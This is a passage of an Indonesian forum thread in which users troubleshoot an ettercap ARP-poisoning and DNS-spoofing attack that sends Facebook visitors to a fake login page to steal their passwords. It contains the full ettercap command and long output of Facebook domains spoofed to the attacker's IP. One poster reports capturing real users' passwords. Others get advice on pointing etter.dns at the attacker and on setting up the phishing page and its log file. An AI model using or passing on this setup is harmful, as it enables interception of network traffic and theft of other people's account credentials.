[Share] ettercap dns_spoof (fake login) #PART 2
#31
kak.. kok d tempat saya nano /usr/local/share/ettercap/etter.dns kosong..??
mohon pencerahannya kak.. Sad

#32
(01-22-2012, 01:25 PM)system112 Wrote: kak.. kok d tempat saya nano /usr/local/share/ettercap/etter.dns kosong..??
mohon pencerahannya kak.. Sad

coba locate etter.dns ada di folder mana lokasinya?

#33
thanks kak,
[email protected]:~# locate etter.dns
/usr/local/share/videojak/etter.dns
/usr/share/ettercap/etter.dns

#34
tuh kliatan, klo ane pilih yg kedua yg nano /use/share/ettercap/etter.dns Smile

#35
(01-22-2012, 03:03 PM)konspirasi Wrote: tuh kliatan, klo ane pilih yg kedua yg nano /use/share/ettercap/etter.dns Smile

haha berhasil nih om
[Image: bgbdk5.jpg]
password tidak ane ganti tenang aja

eh dapet lagi nih
[Image: 2uh5qwk.jpg]

AngelAngel

#36
punya saya koq kayak gini yaa??
Code:
[email protected]:~# ettercap -Tq -i wlan0 -P dns_spoof -M arp // //

ettercap NG-0.7.3 copyright 2001-2004 ALoR & NaGA

Listening on wlan0... (Ethernet)

wlan0 ->    74:2F:68:37:D5:C1    192.168.104.65     255.255.255.0

Privileges dropped to UID 0 GID 0...

  28 plugins
  39 protocol dissectors
  53 ports monitored
7587 mac vendor fingerprint
1698 tcp OS fingerprint
2183 known services

Randomizing 255 hosts for scanning...
Scanning the whole netmask for 255 hosts...
* |==================================================>| 100.00 %

1 hosts added to the hosts list...

ARP poisoning victims:

GROUP 1 : ANY (all the hosts in the list)

GROUP 2 : ANY (all the hosts in the list)
Starting Unified sniffing...


Text only Interface activated...
Hit 'h' for inline help

Activating dns_spoof plugin...

dns_spoof: [www.facebook.com] spoofed to [198.168.104.65]
dns_spoof: [www.facebook.com] spoofed to [198.168.104.65]
dns_spoof: [www.facebook.com] spoofed to [198.168.104.65]
dns_spoof: [www.facebook.com] spoofed to [198.168.104.65]
dns_spoof: [www.facebook.com] spoofed to [198.168.104.65]
dns_spoof: [www.facebook.com] spoofed to [198.168.104.65]
dns_spoof: [0-ih-w.channel.facebook.com] spoofed to [198.168.104.65]
dns_spoof: [0-ih-w.channel.facebook.com] spoofed to [198.168.104.65]
dns_spoof: [0-ih-w.channel.facebook.com] spoofed to [198.168.104.65]
DHCP: [00:A1:B0:81:5C:C8] DISCOVER
DHCP: [00:A1:B0:81:5C:C8] REQUEST 192.168.104.62
DHCP: [64:27:37:2C:F0:4D] REQUEST 192.168.104.66
DHCP: [192.168.104.1] ACK : 192.168.104.66 255.255.255.0 GW 11.3.4.3 DNS 202.162.220.110
dns_spoof: [www.facebook.com] spoofed to [198.168.104.65]
DHCP: [00:A1:B0:81:5C:C8] DISCOVER
DHCP: [00:A1:B0:81:5C:C8] REQUEST 192.168.104.62
dns_spoof: [0-id-w.channel.facebook.com] spoofed to [198.168.104.65]
dns_spoof: [0-id-w.channel.facebook.com] spoofed to [198.168.104.65]
dns_spoof: [0-id-w.channel.facebook.com] spoofed to [198.168.104.65]
DHCP: [192.168.104.1] ACK : 192.168.104.65 255.255.255.0 GW 11.3.4.3 DNS 202.162.220.110
dns_spoof: [0-id-w.channel.facebook.com] spoofed to [198.168.104.65]
dns_spoof: [www.facebook.com] spoofed to [198.168.104.65]
dns_spoof: [www.facebook.com] spoofed to [198.168.104.65]
dns_spoof: [www.facebook.com] spoofed to [198.168.104.65]
dns_spoof: [www.facebook.com] spoofed to [198.168.104.65]
dns_spoof: [0-id-w.channel.facebook.com] spoofed to [198.168.104.65]
dns_spoof: [www.facebook.com] spoofed to [198.168.104.65]
dns_spoof: [0-id-w.channel.facebook.com] spoofed to [198.168.104.65]
dns_spoof: [0-id-w.channel.facebook.com] spoofed to [198.168.104.65]
dns_spoof: [www.facebook.com] spoofed to [198.168.104.65]
dns_spoof: [0-id-w.channel.facebook.com] spoofed to [198.168.104.65]
DHCP: [192.168.104.1] ACK : 0.0.0.0 255.255.255.0 GW 11.3.4.3 DNS 202.162.220.110
dns_spoof: [www.facebook.com] spoofed to [198.168.104.65]
dns_spoof: [www.facebook.com] spoofed to [198.168.104.65]
dns_spoof: [www.facebook.com] spoofed to [198.168.104.65]
dns_spoof: [www.facebook.com] spoofed to [198.168.104.65]
dns_spoof: [www.facebook.com] spoofed to [198.168.104.65]
dns_spoof: [www.facebook.com] spoofed to [198.168.104.65]
dns_spoof: [www.facebook.com] spoofed to [198.168.104.65]
dns_spoof: [www.facebook.com] spoofed to [198.168.104.65]
dns_spoof: [www.facebook.com] spoofed to [198.168.104.65]
dns_spoof: [www.facebook.com] spoofed to [198.168.104.65]
dns_spoof: [www.facebook.com] spoofed to [198.168.104.65]
DHCP: [64:27:37:2C:F0:4D] REQUEST 192.168.104.66
DHCP: [192.168.104.1] ACK : 192.168.104.66 255.255.255.0 GW 11.3.4.3 DNS 202.162.220.110
dns_spoof: [www.facebook.com] spoofed to [198.168.104.65]
dns_spoof: [www.facebook.com] spoofed to [198.168.104.65]
dns_spoof: [www.facebook.com] spoofed to [198.168.104.65]
dns_spoof: [www.facebook.com] spoofed to [198.168.104.65]
dns_spoof: [www.facebook.com] spoofed to [198.168.104.65]
dns_spoof: [www.facebook.com] spoofed to [198.168.104.65]
dns_spoof: [www.facebook.com] spoofed to [198.168.104.65]
dns_spoof: [www.facebook.com] spoofed to [198.168.104.65]
dns_spoof: [1-id-w.channel.facebook.com] spoofed to [198.168.104.65]
dns_spoof: [1-id-w.channel.facebook.com] spoofed to [198.168.104.65]
dns_spoof: [1-id-w.channel.facebook.com] spoofed to [198.168.104.65]
dns_spoof: [1-id-w.channel.facebook.com] spoofed to [198.168.104.65]
dns_spoof: [www.facebook.com] spoofed to [198.168.104.65]
dns_spoof: [www.facebook.com] spoofed to [198.168.104.65]
dns_spoof: [www.facebook.com] spoofed to [198.168.104.65]
dns_spoof: [0-id-w.channel.facebook.com] spoofed to [198.168.104.65]
DHCP: [64:27:37:2C:F0:4D] REQUEST 192.168.104.66
DHCP: [192.168.104.1] ACK : 192.168.104.66 255.255.255.0 GW 11.3.4.3 DNS 202.162.220.110
DHCP: [192.168.104.1] ACK : 0.0.0.0 255.255.255.0 GW 11.3.4.3 DNS 202.162.220.110
DHCP: [00:A1:B0:81:5C:C8] REQUEST 192.168.104.62
dns_spoof: [1-id-w.channel.facebook.com] spoofed to [198.168.104.65]
dns_spoof: [1-id-w.channel.facebook.com] spoofed to [198.168.104.65]
dns_spoof: [www.facebook.com] spoofed to [198.168.104.65]
dns_spoof: [www.facebook.com] spoofed to [198.168.104.65]
dns_spoof: [0-id-w.channel.facebook.com] spoofed to [198.168.104.65]
dns_spoof: [0-id-w.channel.facebook.com] spoofed to [198.168.104.65]
DHCP: [192.168.104.1] ACK : 0.0.0.0 255.255.255.0 GW 11.3.4.3 DNS 202.162.220.110
dns_spoof: [www.facebook.com] spoofed to [198.168.104.65]
dns_spoof: [www.facebook.com] spoofed to [198.168.104.65]
dns_spoof: [0-id-w.channel.facebook.com] spoofed to [198.168.104.65]
dns_spoof: [1-id-w.channel.facebook.com] spoofed to [198.168.104.65]
dns_spoof: [static.ak.facebook.com] spoofed to [198.168.104.65]
dns_spoof: [s-static.ak.facebook.com] spoofed to [198.168.104.65]
dns_spoof: [www.facebook.com] spoofed to [198.168.104.65]
dns_spoof: [www.facebook.com] spoofed to [198.168.104.65]
DHCP: [00:21:00:1F:6D:D8] DISCOVER
dns_spoof: [facebook.com] spoofed to [198.168.104.65]
dns_spoof: [s-static.ak.facebook.com] spoofed to [198.168.104.65]
dns_spoof: [www.facebook.com] spoofed to [198.168.104.65]
dns_spoof: [developers.facebook.com] spoofed to [198.168.104.65]
dns_spoof: [www.facebook.com] spoofed to [198.168.104.65]
dns_spoof: [www.facebook.com] spoofed to [198.168.104.65]
dns_spoof: [www.facebook.com] spoofed to [198.168.104.65]
dns_spoof: [static.ak.facebook.com] spoofed to [198.168.104.65]
dns_spoof: [s-static.ak.facebook.com] spoofed to [198.168.104.65]
dns_spoof: [www.facebook.com] spoofed to [198.168.104.65]
dns_spoof: [www.facebook.com] spoofed to [198.168.104.65]
semua cara sudah benar,, tapi ketika user masuk ke www.facebook.com dan melakukan login,, justru dia bisa masuk ke beranda facebooknya,, dan alhasil passwordpun tak dapat.. dan file logs.txt nya juga tidak ada,, saya coba cara ini di mikrotik.. Angry
mohon pencerahanya..

#37
wahh kren nih om...
nyoba ah.........
kalo ada problem tolong di bantu ya..........Blush

#38
Permisi kawan, itu yang di etter.dns di isi IP kita atau orang lain?
terus file logs.txt di buat manual dulu atau ntar dia muncul otomatis?
1 lagi, aku coba buka file index.html, kok saat di klik "Login" malah download "post.php" Big Grin Tongue
Backtrack
Kisah tentang kita dan Linux

#39
(04-27-2012, 10:43 AM)Backtrack Dragon Wrote: Permisi kawan, itu yang di etter.dns di isi IP kita atau orang lain?
terus file logs.txt di buat manual dulu atau ntar dia muncul otomatis?
1 lagi, aku coba buka file index.html, kok saat di klik "Login" malah download "post.php" Big Grin Tongue

maaf om coba bantu,
untuk IP yang di etter.dns itu IP kita(attacker) jadi biyar yang buka facebook itu menuju IP kita(attacker),untuk logs.txt dibuat secara manual(wktu saya mencoba),tapi untuk yang klik login tapi download 'post.php' itu ane g mudeng hihi
#semogamembantu Big Grin

#40
Aku coba buka file index.html yang di folder /var/www itu, pas klik login, malah dia download file post.php tadi. jadi sekarang juga masih bingung. tidak ada usrname&pass yang ketangkap Tongue
Backtrack
Kisah tentang kita dan Linux






Users browsing this thread: 1 Guest(s)